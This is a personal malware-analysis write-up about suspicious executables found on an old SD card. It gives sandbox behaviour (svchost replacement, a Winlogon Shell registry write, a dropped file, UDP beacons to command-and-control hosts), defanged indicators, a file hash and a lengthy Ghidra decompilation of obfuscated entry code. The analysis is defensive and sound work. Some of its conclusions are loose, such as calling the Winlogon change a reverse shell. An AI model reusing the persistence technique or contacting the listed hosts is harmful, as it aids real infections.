I served a two year ecclesiastical mission in the Republic of Moldova from 2011 to 2013 for the Church of Jesus Christ of Latter-day Saints. I recently dug through boxes of old memories and found SD cards containing photos and videos from those two years in Moldova.
However, after inserting it into my Linux machine’s SD card reader, I found one to contain multiple sub-folders with odd or Russian named Windows executables. These are not part of the SanDisk default directory structure, nor part of the Canon digital camera software directory structure.
File Analysis
../eksplozivna/naprava.exe
Analysis
I uploaded the file to AnyRun: https://app.any.run/tasks/9a5b4267-cc01-40ff-bdef-eff6b1c702a8
The exe called on svchost.exe and loaded the following dlls:
- ntdll.dll
- wow64.dll
- wow64win.dll
- wow64cpu.dll
- kernel32.dll
- KernelBase.dll
- apphelp.dll
- sechost.dll
- rpcrt4.dll
- bcrypt.dll
- ucrtbase.dll
All dlls are legitimately signed.
The exe replaces the legitimate svchost with a modified version. It sends a write event to registry HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon with the name Shell. This is a big red flag and looks like it is loading a reverse shell to the logon actions.
The program then uses the malicious svchost process to drop another file: cbzvl.exe
The program uses the WinAPI and queries for system information. Then it creates a UDP connection to 45.144.3[.]149 :6600 (peer.pickeklosarske[.]ru)
- 45.144.3[.]149
- 1/94, https://www.virustotal.com/gui/ip-address/45.144.3.149/relations
- HK non-cloud IP that has been serving the same two C2 domains for years:
- peer.pickeklosarske[.]ru
- 5/94, https://www.virustotal.com/gui/domain/peer.pickeklosarske.ru
- known C2
- jebena.ananikolic[.]su
- 9/94, https://www.virustotal.com/gui/domain/jebena.ananikolic.su
- known c2
- peer.pickeklosarske[.]ru
Connection sends 21 bytes. Nothing decipherable in pcap
Another UDP connection is made with 193.166.255[.]171:6600 (teske.pornicarke[.]com) to send another 21 bytes. Also included are additional 21 byte outbound UDP pakcets.
- 193.166.255[.]171
- 1/94, https://www.virustotal.com/gui/ip-address/193.166.255.171
- Finnish IP that serves so many domains. Possibly a legitimate malware sinkhole — or just a lie by a malicious commenter.
- teske.pornicarke[.]com
- 7/94, https://www.virustotal.com/gui/domain/teske.pornicarke.com
- Known as a C2 for a UDP-based worm since back in 2010.
- 224.0.0[.]252
- 0/94, https://www.virustotal.com/gui/ip-address/224.0.0.252
- pcap payload shows ISATAP IPV6 request. Not malicious.
- 208.100.26[.]242
- 4/94, https://www.virustotal.com/gui/ip-address/208.100.26.242
- Known C2 server.
Below are the hash analysis of the files:
- naprava.exe
- SHA256:c1f24e1e78848b9ec2ef0920aa7a4ffed597c2e8cb4dcf221531e411a3058e30
- 68/73, https://www.virustotal.com/gui/file/c1f24e1e78848b9ec2ef0920aa7a4ffed597c2e8cb4dcf221531e411a3058e30
- Known as trojan/worm/pua in the malware families palevo, rimecud, and bredolab.
- cbzvl.exe
- Same as naprava.exe
AnyRun shows the session also reached out to the following IP addresses:
- 184.30.131[.]245
- 0/94, https://www.virustotal.com/gui/ip-address/184.30.131.245
- German Akamai IP. Serves digicert and rapidssl.
- 52.149.20[.]212
- 0/94, https://www.virustotal.com/gui/ip-address/52.149.20.212/relations
- Microsoft update server. Not malicious.
Ghidra analysis of the malware shows the following decompiled code:
void entry(void)
{
int in_EAX;
DWORD DVar1;
size_t sVar2;
LPSYSTEMTIME p_Var3;
int iVar4;
BOOL BVar5;
uint uVar6;
UINT UVar7;
char extraout_CL;
ushort extraout_CX;
short extraout_CX_00;
undefined4 extraout_ECX;
uint extraout_ECX_00;
undefined extraout_DL;
uint extraout_EDX;
undefined4 extraout_EDX_00;
undefined4 extraout_EDX_01;
uint extraout_EDX_02;
char *extraout_EDX_03;
uint extraout_EDX_04;
int extraout_EDX_05;
uint extraout_EDX_06;
uint extraout_EDX_07;
char *extraout_EDX_08;
char *extraout_EDX_09;
uint extraout_EDX_10;
byte bVar8;
ushort uVar9;
uint unaff_EBX;
ushort uVar10;
uint unaff_ESI;
LPSYSTEMTIME p_Var11;
uint uVar12;
uint unaff_EDI;
undefined4 uVar13;
char cVar14;
bool bVar15;
char *pcVar16;
char *pcVar17;
char *pcVar18;
uint local_78;
LARGE_INTEGER local_70;
_SYSTEMTIME local_68;
uint local_58;
char *local_54;
uint local_50;
_SYSTEMTIME local_4c;
uint local_3c;
_SYSTEMTIME local_38;
undefined2 local_28;
ushort local_24;
_SYSTEMTIME local_20;
char *local_10;
byte local_c;
byte local_b;
char local_a;
undefined local_9;
LPSYSTEMTIME local_8;
local_8 = (LPSYSTEMTIME)0xfff5abd4;
if (in_EAX != -0x6f40b600) {
GetStartupInfoA((LPSTARTUPINFOA)&DAT_0040a014);
unaff_EBX = CONCAT22((short)(unaff_EBX >> 0x10),CONCAT11(local_c,(char)unaff_EBX));
DAT_0040a0cc = unaff_EDI;
}
GetSystemTime(&SYSTEMTIME_0040a0d0);
strlen("Rscmc Clf, Nqf. Gau");
DAT_0040a058 = (undefined2)unaff_EBX;
uVar12 = DAT_0040a0e0;
GetSystemTime((LPSYSTEMTIME)&DAT_0040a080);
if (DAT_0040a0cc != unaff_ESI) {
local_8 = (LPSYSTEMTIME)((int)local_8 + uVar12);
}
p_Var11 = (LPSYSTEMTIME)(unaff_ESI & (uint)local_8);
local_8 = (LPSYSTEMTIME)0x114060;
DVar1 = GetTickCount();
if (DVar1 != 0) {
unaff_EBX = (uint)(char)(unaff_EBX >> 8);
local_10 = (char *)0x0;
DAT_0040a05a = extraout_CX;
}
cVar14 = local_8 < DVar1;
local_8 = (LPSYSTEMTIME)((int)local_8 - DVar1);
uVar13 = CONCAT22((short)(unaff_EDI >> 0x10),DAT_0040a0e4);
GetStartupInfoA((LPSTARTUPINFOA)&DAT_0040a014);
GetSystemTime(&local_20);
local_b = (byte)(unaff_EBX >> 8);
DAT_0040a0c7 = (DAT_0040a0c7 - extraout_CL) - cVar14;
DAT_0040a008 = puts("Mojjha Phdr. Ygpa");
_DAT_0040a0e8 = _DAT_0040a0e8 + -0xbe9620;
DAT_0040a000 = 0;
puts("Fbwdc Ymrwoelrx");
GetOEMCP();
DAT_0040a008 = uVar13;
strlen("Oyycv La, Jjpfwl");
DAT_0040a0e0 = DAT_0040a0e0 | extraout_EDX;
pcVar16 = "Lpdm, Rgcmnbe Wmslc";
sVar2 = strlen("Lpdm, Rgcmnbe Wmslc");
if (((LPSYSTEMTIME)local_10 == p_Var11) &&
(unaff_EBX = unaff_EBX + (-(uint)(local_10 < p_Var11) - sVar2),
((uint)pcVar16 & (uint)p_Var11) == 0)) {
local_10 = (char *)unaff_EBX;
}
sVar2 = strlen("Qlmqipqh Gaxmdj Qwl");
local_8 = (LPSYSTEMTIME)((uint)local_8 | 0x244);
_DAT_0040a0e8 = extraout_EDX_00;
if ((short)sVar2 != DAT_0040a0e6) {
p_Var3 = &local_20;
GetSystemTime(p_Var3);
if (p_Var3 == (LPSYSTEMTIME)0x0) {
unaff_EBX = unaff_EBX & 0xffff0000;
_DAT_0040a0ec = extraout_ECX;
}
unaff_EBX = CONCAT22((short)(unaff_EBX >> 0x10),local_28);
}
GetSystemTime(&local_38);
p_Var3 = &local_4c;
local_3c = (uint)p_Var11;
GetSystemTime(p_Var3);
if ((DAT_0040a0c2 == (short)p_Var3) &&
(p_Var11 = local_8, _DAT_0040a0f4 = extraout_EDX_01, ((uint)p_Var3 & 0xaafae336) == 0)) {
DAT_0040a00d = DAT_0040a00d + -0x10;
p_Var3 = DAT_0040a0c8;
unaff_EBX = DAT_0040a0f0;
}
DAT_0040a0cc = extraout_ECX_00;
local_8 = p_Var3;
iVar4 = puts("Cjkh Kpgoft Mrl");
if (iVar4 == 0) {
local_10 = (char *)0x0;
DAT_0040a074 = 0xffffffff;
}
DAT_0040a0f8 = DAT_0040a0f8 ^ 0xffff;
pcVar16 = (char *)CONCAT31((int3)(unaff_EBX >> 8),DAT_0040a00e);
strlen("Enoutwjs Mngef Ybwg");
DAT_0040a060 = (char *)0x1d0;
local_10 = (char *)((uint)local_10 & extraout_EDX_02);
strlen("Jrkxwqmylr, Tetmf");
pcVar17 = "Ixjyep. Ths, Tcfbe";
strlen("Ixjyep. Ths, Tcfbe");
local_54 = pcVar17;
local_24 = FUN_00408ce9(pcVar17,extraout_DL);
pcVar17 = local_10;
DAT_0040a0fc = 0;
if ((char)local_24 == 'P') {
BVar5 = QueryPerformanceCounter((LARGE_INTEGER *)&DAT_0040a090);
local_24 = (ushort)BVar5;
_DAT_0040a100 = 0x2c3468;
pcVar16 = (char *)~(uint)pcVar16;
GetSystemTime((LPSYSTEMTIME)&DAT_0040a080);
}
local_3c = (uint)p_Var11;
GetStartupInfoA((LPSTARTUPINFOA)&DAT_0040a014);
local_b = 0;
puts("Homaqmdy Rup Ox");
iVar4 = puts("Crbw, Kcfsu, Qsqy");
if ((iVar4 != 0) && (DAT_0040a05a = DAT_0040a05a & (ushort)pcVar16, (int)local_8 <= (int)p_Var11))
{
local_a = -1;
}
strlen("Sjrk. Yg. Wgkqfp");
local_50 = 0;
iVar4 = puts("Gdhthyy Ygcp Gobqc");
if (local_a == (char)iVar4) {
bVar15 = CARRY4((uint)p_Var11,(uint)pcVar17);
p_Var11 = (LPSYSTEMTIME)((int)p_Var11 + (int)pcVar17);
pcVar16 = extraout_EDX_03 + (uint)bVar15 + CONCAT31((int3)((uint)pcVar16 >> 8),local_c);
local_58 = 0;
if (pcVar17 == extraout_EDX_03) {
_DAT_0040a0bc = 0x2d2be4;
}
}
local_50 = 0x39614c;
p_Var3 = &local_68;
GetSystemTime(p_Var3);
if (p_Var3 == (LPSYSTEMTIME)0x0) {
DAT_0040a0c8 = (LPSYSTEMTIME)0x26c;
local_54 = pcVar17;
local_24 = (ushort)pcVar16;
}
_DAT_0040a104 = pcVar17;
pcVar18 = "Brlptjuj. Lpiul";
strlen("Brlptjuj. Lpiul");
local_8 = (LPSYSTEMTIME)((int)local_8 - (int)pcVar18);
FUN_00407736("Mpspyof. Q");
GetStartupInfoA((LPSTARTUPINFOA)&DAT_0040a108);
GetTickCount();
if (local_b != (byte)pcVar16) {
_DAT_0040a0fa = 0xe8;
local_8 = (LPSYSTEMTIME)(((int)local_8 - extraout_EDX_04) - (uint)(local_b < (byte)pcVar16));
DAT_0040a0e0 = extraout_EDX_04;
}
local_c = 0x2c;
if ((char)((uint)pcVar16 >> 8) == ',') {
puts("Qqrlmn. Rfyag, Gur");
}
local_8 = (LPSYSTEMTIME)((int)local_8 + 0x33714c);
local_50 = local_50 - 0xc4faa0;
_DAT_0040a14c = _DAT_0040a14c & (ushort)local_58;
DAT_0040a074 = 0;
strlen("Jnywjsxv Ycr Twdygo");
QueryPerformanceCounter(&local_70);
FUN_00407736(s_Peys,_Fk,_Xjffdr_0040a158);
iVar4 = puts("Yyhlxc, Tqoa Tekwhr");
if (iVar4 != DAT_0040a0a4) {
puts("Yupo Rpi Pjvlt, Nxo");
pcVar16 = DAT_0040a060;
}
local_50 = local_50 & 0x1517a4;
GetTickCount();
uVar10 = local_24;
local_58 = local_58 - 0xdd5f30;
DAT_0040a0fe = 1;
uVar12 = CONCAT22((short)((uint)p_Var11 >> 0x10),local_24);
cVar14 = '\x15';
DAT_0040a0c8 = (LPSYSTEMTIME)pcVar16;
uVar6 = puts("Etixxpcu Xua, Rcm");
if ((uVar6 != 0) && ((_DAT_0040a16c & uVar6) != 0)) {
_DAT_0040a14e = 0xe7f4;
local_58 = (uint)pcVar17 >> 0x18 | ((uint)pcVar17 & 0xff0000) >> 8 |
((uint)pcVar17 & 0xff00) << 8 | (int)pcVar17 << 0x18;
}
strlen("Krcjo, Ldtvhs Tcb");
puts("Jcjia Ewn, Qlhpq");
if (DAT_0040a170 == extraout_EDX_05) {
local_54 = pcVar16;
}
local_8 = (LPSYSTEMTIME)((int)local_8 + 0x96a3c0);
bVar8 = 0x60;
strlen("Xfhdu Nufd, Ajnx");
p_Var11 = local_8;
bVar15 = DAT_0040a0c6 < bVar8;
if (DAT_0040a0c6 == bVar8) {
bVar15 = 0xfffffe2f < local_58;
local_58 = local_58 + 0x1d0;
local_50 = (local_50 - 1) - (uint)bVar15;
DAT_0040a0e4 = 0xbae0;
local_24 = (ushort)cVar14;
bVar15 = local_24 < (ushort)pcVar16;
if (local_24 == (ushort)pcVar16) {
bVar15 = false;
}
}
DAT_0040a0ff = DAT_0040a0ff + -0x70 + bVar15;
uVar6 = FUN_004078aa();
if (p_Var11 == (LPSYSTEMTIME)uVar6) {
strlen("Pjprvc Kbc. Pacgex");
}
puts("Wetujnfoun Epgj");
sVar2 = strlen("Ckp, Tvbv Woqkrvgy");
if (DAT_0040a074 == extraout_EDX_06) {
local_58 = (local_58 - 0x3a2b10) - (uint)(DAT_0040a074 < extraout_EDX_06);
local_24 = 1;
if (sVar2 != 0x9c6cb36d) {
local_a = -0x50;
}
}
local_54 = (char *)((uint)local_54 | 0x3c8);
_DAT_0040a0a8 = 0xa91030;
GetACP();
DAT_0040a174 = local_78;
UVar7 = GetOEMCP();
if ((DAT_0040a0c2 != extraout_CX_00) && ((UVar7 & 0xa3c0b358) == 0)) {
p_Var11 = (LPSYSTEMTIME)(extraout_EDX_07 >> 8 & 0xff);
}
DAT_0040a178 = uVar12;
iVar4 = puts("Rwvbvtfp. Sdcdt");
if (iVar4 == 0) {
local_78 = -local_78;
_DAT_0040a17c = SUB42(p_Var11,0);
}
local_24 = (ushort)local_78;
GetSystemTime(&local_38);
FUN_00407736(s_Wxml._Gyak_0040a180);
bVar8 = (byte)p_Var11;
uVar9 = CONCAT11(local_a,bVar8);
pcVar16 = extraout_EDX_08;
if ((uVar9 != uVar10) &&
(sVar2 = strlen("Hykkl Cah. Lhk. Kt"), pcVar16 = extraout_EDX_09, sVar2 == 0)) {
DAT_0040a18c = DAT_0040a18c + -1;
pcVar16 = local_10;
}
uVar12 = ~uVar12;
local_10 = pcVar16;
puts("Vdqejy Eeqgd Yleorx");
local_a = '\x01';
_DAT_0040a010 = local_78;
local_8 = (LPSYSTEMTIME)CONCAT22((short)((uint)p_Var11 >> 0x10),uVar9);
GetOEMCP();
cVar14 = bVar8 + (char)DAT_0040a074 + (local_c < bVar8);
QueryPerformanceCounter(&local_70);
_DAT_0040a17e = 1;
pcVar16 = "Lwilrw. Smxq, Mtg";
puts("Lwilrw. Smxq, Mtg");
bVar15 = DAT_0040a0e0 < local_78;
if (DAT_0040a0e0 != local_78) {
DAT_0040a0cc = extraout_EDX_10 & (uint)DAT_0040a060;
cVar14 = (char)local_54;
bVar15 = local_10 != (char *)0xffffffff;
if (!bVar15) {
DAT_0040a0cc = 0x68f130;
cVar14 = '\0';
}
pcVar16 = (char *)~(uint)pcVar16;
}
local_10 = local_10 + (-(uint)bVar15 - (int)pcVar16);
sVar2 = strlen("Kbwxyj Csqacui. Stp");
uVar6 = uVar12;
if (sVar2 == 0) {
cVar14 = (char)local_58;
uVar6 = uVar12 - local_58;
}
uVar10 = (ushort)uVar6;
cVar14 = (cVar14 - (char)local_10) - (sVar2 == 0 && uVar12 < local_58);
local_10 = (char *)0xdaea4;
puts("Myvilee, Gvixwh A");
GetTickCount();
local_3c = 0xffffffff;
pcVar16 = "Dyfd, Yannldh Toklr";
strlen("Dyfd, Yannldh Toklr");
FUN_00408800((uint)pcVar16);
bVar8 = 0x34;
iVar4 = puts("Nspexe Yueomh Lh");
if (local_b == bVar8) {
cVar14 = (char)iVar4;
}
if (SBORROW4(local_50,0x3b4)) {
puts("Ydtiyt Rj, Jxkg Tmr");
}
DAT_0040a05a = DAT_0040a05a & 0x3430;
GetStartupInfoA((LPSTARTUPINFOA)&DAT_0040a108);
bVar8 = (byte)DAT_0040a190;
DAT_0040a0c5 = cVar14;
UVar7 = GetOEMCP();
if (UVar7 != 0) {
if ((UVar7 & 0x40) == 0) {
uVar10 = (ushort)DAT_0040a194;
local_9 = (undefined)(UVar7 >> 8);
}
bVar8 = bVar8 & (byte)local_3c;
}
puts("Tfqg Hafugk, Njltyh");
pcVar16 = "Vbix Iowmwtocmr X";
puts("Vbix Iowmwtocmr X");
if (local_24 == uVar10) {
pcVar16 = (char *)CONCAT22((short)((uint)pcVar16 >> 0x10),
CONCAT11(((char)((uint)pcVar16 >> 8) - bVar8) - (local_24 < uVar10),
(char)pcVar16));
}
DAT_0040a078 = &DAT_00414570 + (uint)(local_24 != uVar10 && local_24 < uVar10) + (int)DAT_0040a078
;
DAT_0040a0c4 = DAT_0040a0c4 + ' ';
local_54 = pcVar16;
GetACP();
GetSystemTime((LPSYSTEMTIME)&DAT_0040a19c);
DAT_0040a05a = DAT_0040a05a - 1;
FUN_00408f23();
/* WARNING: Subroutine does not return */
ExitProcess(0);
}Conclusion
The malware naprava.exe gathers system information, drops a reverse shell in the WinLogon registry, and then sends info to C2 servers.